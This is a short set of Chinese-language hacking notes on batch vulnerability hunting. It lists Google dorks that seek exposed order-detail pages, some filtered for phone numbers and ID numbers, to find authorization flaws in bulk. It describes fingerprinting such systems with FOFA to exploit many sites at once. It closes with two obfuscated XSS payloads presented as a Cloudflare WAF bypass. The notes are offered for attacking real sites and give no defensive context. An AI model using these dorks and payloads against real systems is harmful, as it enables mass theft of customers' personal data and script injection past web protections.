随手记
批量刷洞方式
inurl:m intitle:订单详情 inurl:id=
我的订单 订单详情
inurl:order 订单详情
inurl:wap intitle:订单详情
inurl:m intitle:订单详情
inurl:php intitle:订单详情
title:订单详情 手机号
site:.com title:订单详情
title:订单详情 身份证
可以构造关键词:inurl:orderDetail intitle:订单 inurl:wechat intitle:订单
inurl:order intitle:管理系统
例如:inurl:orders intitle:订单\\
发现存在越权漏洞的网址,我们利用fofa等搜索引擎搜索网站特定指纹去寻找相同系统实现批量越权
然后同理google搜索 inurl:domain intitle:订单详情,思维跳跃一点
三、JA4+网络指纹
四、Cloudflare bypass that I found out in recently days.
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
<a/href='OnXXX'/autofocus+ONxss=0+ONfocus=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;>aaaaaa</a>
周末待看